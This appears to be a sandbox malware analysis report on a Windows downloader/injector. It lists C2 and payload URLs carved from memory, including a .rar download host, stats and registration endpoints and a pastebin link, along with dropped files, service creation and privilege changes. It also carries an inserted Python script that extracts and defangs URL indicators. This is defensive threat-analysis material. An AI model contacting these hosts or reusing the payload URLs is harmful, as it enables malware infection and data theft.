Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.29/server.txt
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.45/
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.45/proxies.txt
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.45/proxies.txtE
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048824800.0000000000C7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net/
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar&
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar0
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarDownloadManager
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarI
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarW
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rare
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarras
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarx
              Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru/api/setStats.php
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru:80/api/setStats.php
              Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
              Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
              Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
              Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
              Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
              Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
              Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048824800.0000000000C7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
              Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
              Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
              Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
              Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
              Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/api
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://db-ip.com/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://db-ip.com/https://ipgeolocation.io/https://www.maxmind.com/en/locate-my-ip-addresstype
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://ipgeolocation.io/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://ipinfo.io/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://ipinfo.io/Content-Type:
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/A7dSG1te
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/~
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com:443/raw/A7dSG1te
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://softs-portal.com/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://softs-portal.com/api/registerUser.php
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://softs-portal.com/api/registerUser.phpg
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/J
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/file/400780400026/1/xwmW8Qofk5M.263566/16218cb12e7549e76b
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/file/400780400431/1/-u0XrknOtfw.232636/60f98efd626b95d010
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048824800.0000000000C7C000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/img/t_logo.png
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org:443/P7
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/telegram
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
              Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
              Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49724 version: TLS 1.2
              Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_5eb72636-5
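The strings above are carved from process memory, so one indicator surfaces many times: with trailing junk bytes (communication.php0, communication.phpK, k1.rarDownloadManager), with and without an explicit default port (pastebin.com:443, 212.193.30.21:80), and occasionally run together into one token (https://db-ip.com/https://ipgeolocation.io/...). Before any of this goes into a blocklist it has to be normalised, and the legitimate SciTE.exe credits (activestate.com, scintilla.org) and geolocation services kept apart from the C2 hosts. The following Python is an added example and not part of the Joe Sandbox report: it pulls URL-shaped strings out of report text, strips default ports, folds carving variants back onto the clean form that was also seen, and defangs the result. The sample input is a constructed excerpt in the shape of the lines above; the four-character tail limit is an assumption.

```python
"""Extract, normalise and defang URL indicators carved from a sandbox report."""
import re

# RFC 3986 URL characters; junk bytes carved after the string terminator often fall in this set too.
_URL_RE = re.compile(r"https?://[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+")
_TAIL_MAX = 4  # assumed: longest run of trailing junk folded back onto a clean URL


def extract_urls(text):
    """Every URL-looking token in order of first appearance. Concatenated strings such as
    'https://a/https://b/' are split at each embedded scheme."""
    seen, out = set(), []
    for m in _URL_RE.finditer(text):
        for u in re.split(r"(?=https?://)", m.group(0)):
            if u and u not in seen:
                seen.add(u)
                out.append(u)
    return out


def strip_default_port(url):
    """'http://h:80/x' and 'https://h:443/x' are the same indicator as the portless form."""
    url = re.sub(r"^(http://[^/:]+):80(?=/|$)", r"\1", url)
    return re.sub(r"^(https://[^/:]+):443(?=/|$)", r"\1", url)


def collapse_variants(urls, tail_max=_TAIL_MAX):
    """Fold 'http://h/c.php0' and 'http://h/c.phpK' onto 'http://h/c.php' when the clean
    form was also carved. A URL is a variant of a shorter carved URL when the extra tail
    contains no '/' and is either short or follows a file-like last path segment.
    Shortest candidate wins, so a real path that extends another carved URL could be
    over-folded: keep the raw list as evidence."""
    canon = sorted(set(urls), key=len)
    out = []
    for u in urls:
        base = u
        for cand in canon:
            tail = u[len(cand):]
            if not (u.startswith(cand) and tail and "/" not in tail):
                continue
            if len(tail) <= tail_max or "." in cand.rsplit("/", 1)[-1]:
                base = cand
                break
        if base not in out:
            out.append(base)
    return out


def normalise_indicators(text):
    """extract -> strip default ports -> collapse carving variants."""
    urls = []
    for u in extract_urls(text):
        u = strip_default_port(u)
        if u not in urls:
            urls.append(u)
    return collapse_variants(urls)


def defang(url):
    """hxxp://1[.]2[.]3[.]4/path: scheme and host dots neutralised, path left intact."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


# Constructed sample: a few lines in the shape of the report's "String found in binary or memory" rows.
SAMPLE_REPORT = """\
Source: sample.exe, 00000000.00000002.sdmp String found in binary or memory: http://212.193.30.21/service/communication.php
Source: sample.exe, 00000000.00000002.sdmp String found in binary or memory: http://212.193.30.21/service/communication.php0
Source: sample.exe, 00000000.00000002.sdmp String found in binary or memory: http://212.193.30.21/service/communication.phpK
Source: sample.exe, 00000000.00000002.sdmp String found in binary or memory: http://212.193.30.21:80/service/communication.php
Source: vXQpuA.exe, 00000001.00000002.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: vXQpuA.exe, 00000001.00000002.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarDownloadManager
Source: sample.exe, 00000000.00000002.sdmp String found in binary or memory: https://pastebin.com/raw/A7dSG1te
Source: sample.exe, 00000000.00000002.sdmp String found in binary or memory: https://pastebin.com:443/raw/A7dSG1te
Source: sample.exe, 00000000.00000002.sdmp String found in binary or memory: https://telegram.org/
Source: sample.exe, 00000000.00000002.sdmp String found in binary or memory: https://telegram.org/J
Source: sample.exe String found in binary or memory: https://db-ip.com/https://ipgeolocation.io/https://www.maxmind.com/en/locate-my-ip-addresstype
Source: sample.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
"""

if __name__ == "__main__":
    for ioc in normalise_indicators(SAMPLE_REPORT):
        print(defang(ioc))
```

Two hosts that only share a prefix, such as http://212.193.30.29/ and http://212.193.30.29/server.txt, stay separate: the tail exceeds the limit and the shorter URL ends in a directory rather than a file. The folding is a heuristic for de-duplicating carving noise, not a statement about which URLs are malicious; the geolocation and Telegram URLs still need an analyst to decide whether they are C2, profiling, or decoy traffic.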

System Summary

Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, type: SAMPLE | Matched rule: Detects downloader / injector Author: ditekSHen
Source: 0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE | Matched rule: Detects downloader / injector Author: ditekSHen
Source: 0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE | Matched rule: Detects downloader / injector Author: ditekSHen
Source: MyProg.exe.1.dr | Static PE information: section name: Y|uR
Source: vXQpuA.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0031B1F0
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_003219B0
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00315BA0
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0031ACD0
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00342020
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00361000
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0035F0AD
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0033D0D0
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_003432C0
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00315340
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0031C450
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0035A583
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0035162B
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0035A6A3
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00342740
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0033D8C0
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00320A20
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0033FAA0
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00377B71
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00343C20
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00341C50
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0035ACF6
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0034FD50
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00314DE0
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_0034DDEF
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00313ED0
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function: 1_2_00616076
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function: 1_2_00616D00
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\vXQpuA.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: String function: 00349E80 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1392
Source: MyProg.exe.1.dr | Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, type: SAMPLE | Matched rule: MALWARE_Win_DLInjector06 author = ditekSHen, description = Detects downloader / injector
Source: 0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector06 author = ditekSHen, description = Detects downloader / injector
Source: 0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector06 author = ditekSHen, description = Detects downloader / injector
Source: vXQpuA.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vXQpuA.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vXQpuA.exe.0.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: classification engine | Classification label: mal100.spre.troj.evad.winEXE@4/9@7/6
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function: 1_2_0061119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_00320A20 OpenSCManagerA,DeleteFileA,DeleteFileA,CopyFileA,OpenServiceA,CloseServiceHandle,GetUserNameA,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function: 0_2_003202C0 StartServiceCtrlDispatcherA
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5064
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | File created: C:\Users\user\AppData\Local\Temp\vXQpuA.exe
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Command line argument: 0.8 (0_2_003219B0)
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | ReversingLabs: Detection: 97%
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | String found in binary or memory: https://db-ip.com/https://ipgeolocation.io/https://www.maxmind.com/en/locate-my-ip-addresstype must be boolean, but is type must be number, but is type must be number, but is type must be number, but is type must be string, but is GETPOSTMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36-2L-1L0123456789abcdef
Source: unknown | Process created: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe "C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe"
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Process created: C:\Users\user\AppData\Local\Temp\vXQpuA.exe C:\Users\user\AppData\Local\Temp\vXQpuA.exe
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1392
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Section loaded: iertutil.dll
